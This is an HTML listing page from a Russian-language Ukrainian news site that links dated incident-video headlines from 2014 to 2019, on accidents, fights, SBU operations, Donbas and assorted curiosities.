				    				    	<a class="postTitle" href="https://enovosty.com/proishestviya-video/full/1211-neveroyatnaya-zhestokost-v-xarkove-devushki-ustroili-zhestokuyu-draku-iz-za-parnya-video">Бей кулаками по голове: В Харькове девушки устроили жестокую драку из-за парня (ВИДЕО)</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
						<div class="cls"></div>
				<hr />
				<div class="cls"></div>
			<div class='cls'></div><span class='news_date'>11.11.2019 г.</span><br />			<div class="post_news">
			    <span id="post-4781632">
				    <span class="postDate">23:58</span>
				    				    	<a class="postTitle" href="https://enovosty.com/proishestviya-video/full/1111-polzovateli-socsetej-ispugalis-ryby-s-chelovecheskim-licom-video">Пользователи соцсетей испугались рыбы с «человеческим лицом» (ВИДЕО)</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
						<div class="cls"></div>
				<hr />
				<div class="cls"></div>
			<div class='cls'></div><span class='news_date'>05.11.2019 г.</span><br />			<div class="post_news">
			    <span id="post-4780763">
				    <span class="postDate">17:03</span>
				    				    	<a class="postTitle" href="https://enovosty.com/proishestviya-video/full/511-v-stolice-avto-provalilos-pod-asfalt-video">В столице авто провалилось под асфальт (ВИДЕО)</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
						<div class="cls"></div>
				<hr />
				<div class="cls"></div>
			<div class='cls'></div><span class='news_date'>29.10.2019 г.</span><br />			<div class="post_news">
			    <span id="post-4779773">
				    <span class="postDate">15:29</span>
				    				    	<a class="postTitle" href="https://enovosty.com/proishestviya-video/full/2910-v-dnepre-v-supermarkete-proizoshla-zhestokaya-draka-mezhdu-oxrannikom-i-pokupatelem-video">В Днепре в супермаркете произошла жестокая драка между охранником и покупателем (ВИДЕО)</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
						<div class="cls"></div>
				<hr />
				<div class="cls"></div>
			<div class='cls'></div><span class='news_date'>03.10.2019 г.</span><br />			<div class="post_news">
			    <span id="post-4776030">
				    <span class="postDate">21:59</span>
				    				    	<a class="postTitle" href="https://enovosty.com/proishestviya-video/full/310-rabotniki-sto-predotvratili-pokushenie-na-ubijstvo-video">Работники СТО предотвратили покушение на убийство (ВИДЕО)</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
						<div class="cls"></div>
				<hr />
				<div class="cls"></div>
			<div class='cls'></div><span class='news_date'>02.10.2019 г.</span><br />			<div class="post_news">
			    <span id="post-4775785">
				    <span class="postDate">18:12</span>
				    				    	<a class="postTitle" href="https://enovosty.com/proishestviya-video/full/210-kontrrazvedchiki-sbu-razoblachili-popytku-verbovki-inostranca-predstavitelyami-mgb-dnr-video">Контрразведчики СБУ разоблачили попытку вербовки иностранца представителями "МГБ ДНР" (ВИДЕО)</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
					<div class="post_news">
			    <span id="post-4775756">
				    <span class="postDate">16:45</span>
				    				    	<a class="postTitle" href="https://enovosty.com/proishestviya-video/full/210-evroblyaxery-protestuyut-u-sten-rady-podrobnosti-video">"Евробляхеры" протестуют у стен Рады: подробности (ВИДЕО)</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
						<div class="cls"></div>
				<hr />
				<div class="cls"></div>
			<div class='cls'></div><span class='news_date'>12.09.2019 г.</span><br />			<div class="post_news">
			    <span id="post-4772677">
				    <span class="postDate">20:14</span>
				    				    	<a class="postTitle" href="https://enovosty.com/proishestviya-video/full/1209-nakanune-xarkovprajda-oblili-zelenkoj-olesya-doniya">Накануне "ХарьковПрайда" Олеся Дония облили зеленкой (ВИДЕО)</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
						<div class="cls"></div>
				<hr />
				<div class="cls"></div>
			<div class='cls'></div><span class='news_date'>03.09.2019 г.</span><br />			<div class="post_news">
			    <span id="post-4771426">
				    <span class="postDate">19:52</span>
				    				    	<a class="postTitle" href="https://enovosty.com/proishestviya-video/full/309-na-kievshhine-goryat-torfyaniki-video">На Киевщине горят торфяники (ВИДЕО)</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
						<div class="cls"></div>
				<hr />
				<div class="cls"></div>
			<div class='cls'></div><span class='news_date'>26.08.2019 г.</span><br />			<div class="post_news">
			    <span id="post-4770398">
				    <span class="postDate">16:18</span>
				    				    	<a class="postTitle" href="https://enovosty.com/proishestviya-video/full/2608-v-xarkove-otchayannye-avtomobilisty-prodolzhayut-ezdit-po-obrushennomu-mostu-video">В Харькове отчаянные автомобилисты продолжают ездить по обрушенному мосту (ВИДЕО)</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
					<div class="post_news">
			    <span id="post-4770362">
				    <span class="postDate">12:16</span>
				    				    	<a class="postTitle" href="https://enovosty.com/proishestviya-video/full/2608-v-ukraine-poyavilsya-chelovek-pauk-lazya-po-mnogoetazhke-on-navodil-poryadok-na-balkonax">В Украине появился человек-паук: поднимаясь по многоэтажке он наводил порядок на балконах (ВИДЕО)</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
						<div class="cls"></div>
				<hr />
				<div class="cls"></div>
			<div class='cls'></div><span class='news_date'>06.08.2019 г.</span><br />			<div class="post_news">
			    <span id="post-4768061">
				    <span class="postDate">18:31</span>
				    				    	<a class="postTitle" href="https://enovosty.com/proishestviya-video/full/608-sbu-blokirovala-ocherednuyu-popytku-verbovki-rossijskix-specsluzhb">СБУ блокировала очередную попытку вербовки украинцев российскими спецслужбами (ВИДЕО)</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
					<div class="post_news">
			    <span id="post-4767951">
				    <span class="postDate">08:52</span>
				    				    	<a class="postTitle" href="https://enovosty.com/proishestviya-video/full/608-beznakazannost-shokiruet-v-smi-pokazali-kak-zhivut-v-kieve-vokzalnye-vory">Безнаказанность шокирует: В СМИ показали, как живут в Киеве вокзальные воры</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
						<div class="cls"></div>
				<hr />
				<div class="cls"></div>
			<div class='cls'></div><span class='news_date'>05.08.2019 г.</span><br />			<div class="post_news">
			    <span id="post-4767836">
				    <span class="postDate">13:08</span>
				    				    	<a class="postTitle" href="https://enovosty.com/proishestviya-video/full/508-katastrofa-v-krymu-iz-za-proryva-damby-v-priozernom-zataplivaet-kerch-video">Катастрофа в Крыму: Из-за прорыва дамбы в Приозерном затапливает Керчь (ВИДЕО)</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
						<div class="cls"></div>
				<hr />
				<div class="cls"></div>
			<div class='cls'></div><span class='news_date'>01.08.2019 г.</span><br />			<div class="post_news">
			    <span id="post-4767410">
				    <span class="postDate">17:11</span>
				    				    	<a class="postTitle" href="https://enovosty.com/proishestviya-video/full/108-zhiteli-okkupirovannogo-donbassa-zasekli-novuyu-texniku-boevikov-video">Жители оккупированного Донбасса засекли новую технику боевиков (ВИДЕО)</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
						<div class="cls"></div>
				<hr />
				<div class="cls"></div>
			<div class='cls'></div><span class='news_date'>29.07.2019 г.</span><br />			<div class="post_news">
			    <span id="post-4766892">
				    <span class="postDate">20:21</span>
				    				    	<a class="postTitle" href="https://enovosty.com/proishestviya-video/full/2907-v-kieve-posle-livnya-obrazovalsya-ocherednoj-potop-video">В столице после ливня затоплены улицы и авто (ВИДЕО)</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
						<div class="cls"></div>
				<hr />
				<div class="cls"></div>
			<div class='cls'></div><span class='news_date'>25.07.2019 г.</span><br />			<div class="post_news">
			    <span id="post-4766404">
				    <span class="postDate">19:47</span>
				    				    	<a class="postTitle" href="https://enovosty.com/proishestviya-video/full/2507-v-ssha-mertvaya-kurica-vnezapno-ozhila-i-sbezhala-s-tarelki-video">В США мертвая курица-зомби внезапно "ожила" и сбежала с тарелки (ВИДЕО)</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
						<div class="cls"></div>
				<hr />
				<div class="cls"></div>
			<div class='cls'></div><span class='news_date'>17.07.2019 г.</span><br />			<div class="post_news">
			    <span id="post-4765122">
				    <span class="postDate">21:30</span>
				    				    	<a class="postTitle" href="https://enovosty.com/proishestviya-video/full/1707-vo-lvove-vyxodili-devochku-rodivshuyusya-s-vesom-480-g-video">Во Львове выходили девочку, родившуюся с весом 480 г (ВИДЕО)</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
						<div class="cls"></div>
				<hr />
				<div class="cls"></div>
			<div class='cls'></div><span class='news_date'>15.07.2019 г.</span><br />			<div class="post_news">
			    <span id="post-4764820">
				    <span class="postDate">21:30</span>
				    				    	<a class="postTitle" href="https://enovosty.com/proishestviya-video/full/1507-zhitelej-berdyanska-atakuyut-krupnye-yadovitye-pauki-video">Жителей Бердянска атакуют крупные ядовитые пауки (ВИДЕО)</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
						<div class="cls"></div>
				<hr />
				<div class="cls"></div>
			<div class='cls'></div><span class='news_date'>10.07.2019 г.</span><br />			<div class="post_news">
			    <span id="post-4764111">
				    <span class="postDate">15:34</span>
				    				    	<a class="postTitle" href="https://enovosty.com/proishestviya-video/full/1007-v-okkupirovannom-donbasse-progremel-moshhnyj-vzryv-video">В оккупированном Донбассе прогремел мощный взрыв (ВИДЕО)</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
						<div class="cls"></div>
				<hr />
				<div class="cls"></div>
			<div class='cls'></div><span class='news_date'>09.07.2019 г.</span><br />			<div class="post_news">
			    <span id="post-4763989">
				    <span class="postDate">18:14</span>
				    				    	<a class="postTitle" href="https://enovosty.com/proishestviya-video/full/907-skorye-neslis-po-kievu-volonter-obratilas-s-prizyvom-k-ukraincam-video">Скорые неслись по Киеву: Юсупова обратилась с призывом к украинцам (ВИДЕО)</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
						<div class="cls"></div>
				<hr />
				<div class="cls"></div>
			<div class='cls'></div><span class='news_date'>03.07.2019 г.</span><br />			<div class="post_news">
			    <span id="post-4763069">
				    <span class="postDate">17:33</span>
				    				    	<a class="postTitle" href="https://enovosty.com/proishestviya-video/full/307-sbu-blokirovala-kontrabandu-sigaret-v-strany-es-video">СБУ блокировала контрабанду сигарет в страны ЕС (ВИДЕО)</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
						<div class="cls"></div>
				<hr />
				<div class="cls"></div>
			<div class='cls'></div><span class='news_date'>11.06.2019 г.</span><br />			<div class="post_news">
			    <span id="post-4760121">
				    <span class="postDate">18:12</span>
				    				    	<a class="postTitle" href="https://enovosty.com/proishestviya-video/full/1106-sbu-razoblachila-ocherednye-popytki-verbovki-prorossijskimi-terroristami-ukrainskix-osuzhdennyx">СБУ разоблачила очередные попытки вербовки пророссийскими террористами украинских осужденных (ВИДЕО)</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
						<div class="cls"></div>
				<hr />
				<div class="cls"></div>
			<div class='cls'></div><span class='news_date'>04.06.2019 г.</span><br />			<div class="post_news">
			    <span id="post-4759072">
				    <span class="postDate">20:58</span>
				    				    	<a class="postTitle" href="https://enovosty.com/proishestviya-video/full/406-ukrainu-oxvatili-massovye-protesty-iz-za-ubijstva-5-letnego-rebenka">Украину охватили массовые протесты из-за убийства 5-летнего ребенка (ВИДЕО)</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
						<div class="cls"></div>
				<hr />
				<div class="cls"></div>
			<div class='cls'></div><span class='news_date'>13.05.2019 г.</span><br />			<div class="post_news">
			    <span id="post-4755765">
				    <span class="postDate">18:20</span>
				    				    	<a class="postTitle" href="https://enovosty.com/proishestviya-video/full/1305-v-kiev-dostavili-novyj-bort-s-tyazhelo-ranennymi-bojcami-s-donbassa">В Киев доставили новый борт с тяжелоранеными бойцами с Донбасса</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
						<div class="cls"></div>
				<hr />
				<div class="cls"></div>
			<div class='cls'></div><span class='news_date'>23.04.2019 г.</span><br />			<div class="post_news">
			    <span id="post-4753397">
				    <span class="postDate">20:51</span>
				    				    	<a class="postTitle" href="https://enovosty.com/proishestviya-video/full/2304-opyat-pozhar-v-parizhe-zagorelis-garazhi-versalya">Опять пожар: В Париже загорелись гаражи Версаля (ВИДЕО)</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
						<div class="cls"></div>
				<hr />
				<div class="cls"></div>
			<div class='cls'></div><span class='news_date'>27.03.2019 г.</span><br />			<div class="post_news">
			    <span id="post-4749248">
				    <span class="postDate">13:01</span>
				    				    	<a class="postTitle" href="https://enovosty.com/proishestviya-video/full/2703-v-krymu-mestnye-zhiteli-podralis-s-omonom-video">В Крыму местные жители подрались с ОМОНом (видео)</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
						<div class="cls"></div>
				<hr />
				<div class="cls"></div>
			<div class='cls'></div><span class='news_date'>05.02.2019 г.</span><br />			<div class="post_news">
			    <span id="post-4741847">
				    <span class="postDate">20:40</span>
				    				    	<a class="postTitle" href="https://enovosty.com/proishestviya-video/full/502-zashhitniki-zhivotnyx-v-kieve-piketiruyut-radu-video">Защитники животных в Киеве пикетируют Раду (ВИДЕО)</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
						<div class="cls"></div>
				<hr />
				<div class="cls"></div>
			<div class='cls'></div><span class='news_date'>04.02.2019 г.</span><br />			<div class="post_news">
			    <span id="post-4741637">
				    <span class="postDate">19:32</span>
				    				    	<a class="postTitle" href="https://enovosty.com/proishestviya-video/full/402-poyavilis-novye-podrobnosti-o-smerti-decla-video">Появились новые подробности о смерти Децла (ВИДЕО)</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
						<div class="cls"></div>
				<hr />
				<div class="cls"></div>
			<div class='cls'></div><span class='news_date'>27.11.2018 г.</span><br />			<div class="post_news">
			    <span id="post-4733162">
				    <span class="postDate">18:29</span>
				    				    	<a class="postTitle" href="https://enovosty.com/proishestviya-video/full/2711-dvesti-dobrovolcev-spasayut-karlikovyx-kosatok-video">Двести добровольцев спасают карликовых косаток (ВИДЕО)</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
						<div class="cls"></div>
				<hr />
				<div class="cls"></div>
			<div class='cls'></div><span class='news_date'>22.11.2018 г.</span><br />			<div class="post_news">
			    <span id="post-4732286">
				    <span class="postDate">11:49</span>
				    				    	<a class="postTitle" href="https://enovosty.com/proishestviya-video/full/2211-cerkovnoe-chudo-v-rukax-glavy-ugkc-razzhizhilas-krov-svyatogo-muchenika-video">Церковное чудо: в руках главы УГКЦ разжижилась кровь святого мученика (ВИДЕО)</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
						<div class="cls"></div>
				<hr />
				<div class="cls"></div>
			<div class='cls'></div><span class='news_date'>08.11.2018 г.</span><br />			<div class="post_news">
			    <span id="post-4730055">
				    <span class="postDate">22:50</span>
				    				    	<a class="postTitle" href="https://enovosty.com/proishestviya-video/full/811-krov-stynet-v-zhilax-devochka-igraet-s-kukloj-na-krayu-balkona-video">Кровь стынет в жилах: девочка играет с куклой на краю балкона (ВИДЕО)</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
						<div class="cls"></div>
				<hr />
				<div class="cls"></div>
			<div class='cls'></div><span class='news_date'>07.11.2018 г.</span><br />			<div class="post_news">
			    <span id="post-4729815">
				    <span class="postDate">19:40</span>
				    				    	<a class="postTitle" href="https://enovosty.com/proishestviya-video/full/711-passazhiry-iz-okna-samoleta-snyali-na-video-tainstvennuyu-anomaliyu-video">Пассажиры из окна самолета сняли на видео таинственную аномалию (ВИДЕО)</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
						<div class="cls"></div>
				<hr />
				<div class="cls"></div>
			<div class='cls'></div><span class='news_date'>06.11.2018 г.</span><br />			<div class="post_news">
			    <span id="post-4729464">
				    <span class="postDate">08:56</span>
				    				    	<a class="postTitle" href="https://enovosty.com/proishestviya-video/full/611-prodolzheniya-skandala-s-tortom-v-xarkove-shkolnica-sdelala-zayavlenie-video">Продолжения скандала с тортом в Харькове: Школьница сделала заявление (ВИДЕО)</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
						<div class="cls"></div>
				<hr />
				<div class="cls"></div>
			<div class='cls'></div><span class='news_date'>05.11.2018 г.</span><br />			<div class="post_news">
			    <span id="post-4729390">
				    <span class="postDate">20:20</span>
				    				    	<a class="postTitle" href="https://enovosty.com/proishestviya-video/full/511-v-vinnice-zagadochnym-obrazom-poyavilis-tysyachi-odinakovyx-igrushek-na-detskoj-ploshhadke-video">В Виннице загадочным образом появились тысячи игрушек на детской площадке (ВИДЕО)</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
						<div class="cls"></div>
				<hr />
				<div class="cls"></div>
			<div class='cls'></div><span class='news_date'>01.11.2018 г.</span><br />			<div class="post_news">
			    <span id="post-4728845">
				    <span class="postDate">20:02</span>
				    				    	<a class="postTitle" href="https://enovosty.com/proishestviya-video/full/111-na-bortu-samoleta-obitaet-prizrak-video">На борту самолета обитает призрак (ВИДЕО)</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
						<div class="cls"></div>
				<hr />
				<div class="cls"></div>
			<div class='cls'></div><span class='news_date'>28.10.2018 г.</span><br />			<div class="post_news">
			    <span id="post-4727950">
				    <span class="postDate">10:10</span>
				    				    	<a class="postTitle" href="https://enovosty.com/proishestviya-video/full/2810-na-vinnitchine-iz-zlopoluchnoj-fury-vypustili-ovec-kotorye-bolee-dvux-nedel-umirali-v-portu">На Виннитчине из злополучной фуры выпустили овец, которые более двух недель умирали в порту (ВИДЕО)</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
						<div class="cls"></div>
				<hr />
				<div class="cls"></div>
			<div class='cls'></div><span class='news_date'>10.07.2018 г.</span><br />			<div class="post_news">
			    <span id="post-4705658">
				    <span class="postDate">13:59</span>
				    				    	<a class="postTitle" href="https://enovosty.com/proishestviya-video/full/1007-ot-krupnejshego-lednika-grenlandii-otkololsya-shestikilometrovyj-ajsberg-video">От крупнейшего ледника Гренландии откололся шестикилометровый айсберг (ВИДЕО)</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
						<div class="cls"></div>
				<hr />
				<div class="cls"></div>
			<div class='cls'></div><span class='news_date'>26.09.2017 г.</span><br />			<div class="post_news">
			    <span id="post-4644021">
				    <span class="postDate">08:18</span>
				    				    	<a class="postTitle" href="https://enovosty.com/proishestviya-video/full/2609-donetchina-na-grani-ekokatastrofy-oblast-mozhet-ostatsya-bez-pitevoj-vody-video">Донетчина на грани экокатастрофы: область может остаться без питьевой воды (ВИДЕО)</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
						<div class="cls"></div>
				<hr />
				<div class="cls"></div>
			<div class='cls'></div><span class='news_date'>18.05.2017 г.</span><br />			<div class="post_news">
			    <span id="post-4615267">
				    <span class="postDate">08:57</span>
				    				    	<a class="postTitle" href="https://enovosty.com/proishestviya-video/full/1805-udar-po-propagandiststkoj-mashine-kremlya-v-ukraine-nachali-vygonyat-gundyaevskix-svyashhennikov-video">Удар по пропагандистсткой машине Кремля: В Украине начали выгонять гундяевских священников (ВИДЕО)</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
						<div class="cls"></div>
				<hr />
				<div class="cls"></div>
			<div class='cls'></div><span class='news_date'>13.12.2016 г.</span><br />			<div class="post_news">
			    <span id="post-4579891">
				    <span class="postDate">12:53</span>
				    				    	<a class="postTitle" href="https://enovosty.com/proishestviya-video/full/272-ukrainec-pogib-vo-vremya-masshtabnoj-avarii-v-ssha">Украинец погиб во время масштабной аварии в США</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
						<div class="cls"></div>
				<hr />
				<div class="cls"></div>
			<div class='cls'></div><span class='news_date'>12.12.2016 г.</span><br />			<div class="post_news">
			    <span id="post-4579515">
				    <span class="postDate">19:02</span>
				    				    	<a class="postTitle" href="https://enovosty.com/proishestviya-video/full/882-derzkie-grabiteli-poxitili-rekordnuyu-partiyu-zolota-vo-francii">Дерзкие грабители похитили рекордную партию золота во Франции</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
						<div class="cls"></div>
				<hr />
				<div class="cls"></div>
			<div class='cls'></div><span class='news_date'>13.12.2014 г.</span><br />			<div class="post_news">
			    <span id="post-4490134">
				    <span class="postDate">16:12</span>
				    				    	<a class="postTitle" href="https://enovosty.com/proishestviya-video/full/353-territoriya-nepokorennyh-ob-akciyah-na-stolichnom-majdane-nezavisimosti-vsegda-znala-vsya-strana">Территория непокоренных. Об акциях на столичном Майдане Независимости всегда знала вся страна</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
						<div class="cls"></div>
				<hr />
				<div class="cls"></div>
			<div class='cls'></div><span class='news_date'>26.11.2014 г.</span><br />			<div class="post_news">
			    <span id="post-4486081">
				    <span class="postDate">22:38</span>
				    				    	<a class="postTitle" href="https://enovosty.com/proishestviya-video/full/585-territoriya-nepokorennyh-buntarskie-ploshhadi-vo-lvove">Территория непокоренных. Бунтарские площади во Львове</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
						<div class="cls"></div>
				<hr />
				<div class="cls"></div>
			<div class='cls'></div><span class='news_date'>25.11.2014 г.</span><br />			<div class="post_news">
			    <span id="post-4485832">
				    <span class="postDate">23:00</span>
				    				    	<a class="postTitle" href="https://enovosty.com/proishestviya-video/full/641-territoriya-nepokorennyh-vo-lvove-demonstracii-tradicionno-prohodyat-v-dvuh-mestah">Территория непокоренных. Во Львове демонстрации традиционно проходят в двух местах</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
						<div class="cls"></div>
				<hr />
				<div class="cls"></div>
			<div class='cls'></div><span class='news_date'>10.11.2014 г.</span><br />			<div class="post_news">
			    <span id="post-4403729">
				    <span class="postDate">03:35</span>
				    				    	<a class="postTitle" href="https://enovosty.com/proishestviya-video/full/155-territoriya-nepokorennyh-samaya-bolshaya-ploshhad-ukrainy-ploshhad-svobody-v-harkove">Территория непокоренных. Самая большая площадь Украины - площадь Свободы в Харькове</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
						<div class="cls"></div>
				<hr />
				<div class="cls"></div>
			<div class='cls'></div><span class='news_date'>26.10.2014 г.</span><br />			<div class="post_news">
			    <span id="post-4399773">
				    <span class="postDate">01:30</span>
				    				    	<a class="postTitle" href="https://enovosty.com/proishestviya-video/full/383-territoriya-nepokorennyh-baturin-nepokorennaya-stolica-ukrainskih-kazakov">Территория непокоренных: Батурин — непокоренная столица украинских казаков</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
						<div class="cls"></div>
				<hr />
				<div class="cls"></div>
			<div class='cls'></div><span class='news_date'>20.10.2014 г.</span><br />			<div class="post_news">
			    <span id="post-4398046">
				    <span class="postDate">06:59</span>
				    				    	<a class="postTitle" href="https://enovosty.com/proishestviya-video/full/362-territoriya-nepokorennyh-hust-byl-odnim-iz-centrov-sozdaniya-nezavisimoj-ukrainy">Территория непокоренных. Хуст был одним из центров создания независимой Украины</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
						<div class="cls"></div>
				<hr />
				<div class="cls"></div>
			<div class='cls'></div><span class='news_date'>17.10.2014 г.</span><br />			<div class="post_news">
			    <span id="post-4397552">
				    <span class="postDate">10:24</span>
				    				    	<a class="postTitle" href="https://enovosty.com/proishestviya-video/full/535-territoriya-nepokorennyh-chigirin-stolica-kazackogo-gosudarstva-kotoroj-rukovodil-hmelnickij">Территория непокоренных. Чигирин – столица казацкого государства, которой руководил Хмельницкий</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
						<div class="cls"></div>
				<hr />
				<div class="cls"></div>
			<div class='cls'></div><span class='news_date'>13.10.2014 г.</span><br />			<div class="post_news">
			    <span id="post-4396375">
				    <span class="postDate">10:48</span>
				    				    	<a class="postTitle" href="https://enovosty.com/proishestviya-video/full/562-territoriya-nepokorennyh-hortica-serdce-ukrainskogo-kazachestva">Территория непокоренных. Хортица - сердце украинского казачества</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
						<div class="cls"></div>
				<hr />
				<div class="cls"></div>
			<div class='cls'></div><span class='news_date'>17.09.2014 г.</span><br />			<div class="post_news">
			    <span id="post-4389427">
				    <span class="postDate">16:44</span>
				    				    	<a class="postTitle" href="https://enovosty.com/proishestviya-video/full/614-v-kieve-spasateli-vytashhili-iz-dnepra-telo-parnya">В Киеве спасатели вытащили из Днепра тело парня</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
						<div class="cls"></div>
				<hr />
				<div class="cls"></div>
			<div class='cls'></div><span class='news_date'>17.06.2014 г.</span><br />			<div class="post_news">
			    <span id="post-4453692">
				    <span class="postDate">22:41</span>
				    				    	<a class="postTitle" href="https://enovosty.com/proishestviya-video/full/215-effekt-svidetelya-gruzovik-protaranil-5-avtomobilej-est-postradavshie">Эффект свидетеля: Грузовик протаранил 5 автомобилей, есть пострадавшие</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
						<div class="cls"></div>
				<hr />
				<div class="cls"></div>
			<div class='cls'></div><span class='news_date'>16.06.2014 г.</span><br />			<div class="post_news">
			    <span id="post-4365217">
				    <span class="postDate">06:20</span>
				    				    	<a class="postTitle" href="https://enovosty.com/proishestviya-video/full/844-effekt-svidetelya-voditel-neksii-protaranil-otbojnik-i-kamaz-s-neispravnymi-tormozami">Эффект свидетеля: водитель «Нексии» протаранил отбойник и "Камаз" с неисправными тормозами</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
						<div class="cls"></div>
				<hr />
				<div class="cls"></div>
			<div class='cls'></div><span class='news_date'>12.06.2014 г.</span><br />			<div class="post_news">
			    <span id="post-4452708">
				    <span class="postDate">22:15</span>
				    				    	<a class="postTitle" href="https://enovosty.com/proishestviya-video/full/856-effekt-svidetelya-chetyre-podbityh-avtomobilya-i-cirkovoj-tryuk-na-mopede">Эффект свидетеля: четыре подбитых автомобиля и цирковой трюк на мопеде</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
						<div class="cls"></div>
				<hr />
				<div class="cls"></div>
			<div class='cls'></div><span class='news_date'>11.06.2014 г.</span><br />			<div class="post_news">
			    <span id="post-4452430">
				    <span class="postDate">23:01</span>
				    				    	<a class="postTitle" href="https://enovosty.com/proishestviya-video/full/268-hyundaj-vletel-v-vaz-6-postradavshih">"Хюндай" влетел в ВАЗ: 6 пострадавших</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
						<div class="cls"></div>
				<hr />
				<div class="cls"></div>
			<div class='cls'></div><span class='news_date'>06.06.2014 г.</span><br />			<div class="post_news">
			    <span id="post-4451496">
				    <span class="postDate">22:44</span>
				    				    	<a class="postTitle" href="https://enovosty.com/proishestviya-video/full/436-v-rossii-stolknulis-dva-gruzovika-i-avtobus">В России столкнулись два грузовика и автобус</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
						<div class="cls"></div>
				<hr />
				<div class="cls"></div>
			<div class='cls'></div><span class='news_date'>05.06.2014 г.</span><br />			<div class="post_news">
			    <span id="post-4451254">
				    <span class="postDate">23:50</span>
				    				    	<a class="postTitle" href="https://enovosty.com/proishestviya-video/full/257-effekt-svidetelya-v-stolknovenii-hondy-i-lady-s-poslednej-vyletel-passazhir">Эффект свидетеля: в столкновении "Хонды" и "Лады" с последней вылетел пассажир</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
						<div class="cls"></div>
				<hr />
				<div class="cls"></div>
			<div class='cls'></div><span class='news_date'>02.06.2014 г.</span><br />			<div class="post_news">
			    <span id="post-4450514">
				    <span class="postDate">22:41</span>
				    				    	<a class="postTitle" href="https://enovosty.com/proishestviya-video/full/144-v-kieve-voditel-tojoty-sprovociroval-krupnuyu-avariyu-i-skrylsya">В Киеве водитель "Тойоты" спровоцировал крупную аварию и скрылся</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
						<div class="cls"></div>
				<hr />
				<div class="cls"></div>
			<div class='cls'></div><span class='news_date'>29.05.2014 г.</span><br />			<div class="post_news">
			    <span id="post-4450078">
				    <span class="postDate">23:53</span>
				    				    	<a class="postTitle" href="https://enovosty.com/proishestviya-video/full/851-effekt-svidetelya-netrezvyj-voditel-leksusa-ustroil-massovoe-dtp">Эффект свидетеля. Нетрезвый водитель "Лексуса" устроил массовое ДТП</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
						<div class="cls"></div>
				<hr />
				<div class="cls"></div>
			<div class='cls'></div><span class='news_date'>28.05.2014 г.</span><br />			<div class="post_news">
			    <span id="post-4449803">
				    <span class="postDate">23:07</span>
				    				    	<a class="postTitle" href="https://enovosty.com/proishestviya-video/full/771-avtomobil-geely-vyskochil-na-vstrechnuyu-gde-podbil-dve-legkovushki">Автомобиль Geely выскочил на встречную, где подбил две легковушки</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
						<div class="cls"></div>
				<hr />
				<div class="cls"></div>
			<div class='cls'></div><span class='news_date'>07.05.2014 г.</span><br />			<div class="post_news">
			    <span id="post-4355637">
				    <span class="postDate">21:50</span>
				    				    	<a class="postTitle" href="https://enovosty.com/proishestviya-video/full/755-dtp-v-doneckoj-oblasti-i-avariya-bmw-i-samosvala">ДТП в Донецкой области и авария BMW и самосвала</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
						<div class="cls"></div>
				<hr />
				<div class="cls"></div>
			<div class='cls'></div><span class='news_date'>14.04.2014 г.</span><br />			<div class="post_news">
			    <span id="post-4350327">
				    <span class="postDate">21:14</span>
				    				    	<a class="postTitle" href="https://enovosty.com/proishestviya-video/full/856-desyatka-edva-ne-snesla-stolb-no-voditel-vyzhil">"Десятка" едва не снесла столб, но водитель выжил</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
						<div class="cls"></div>
				<hr />
				<div class="cls"></div>
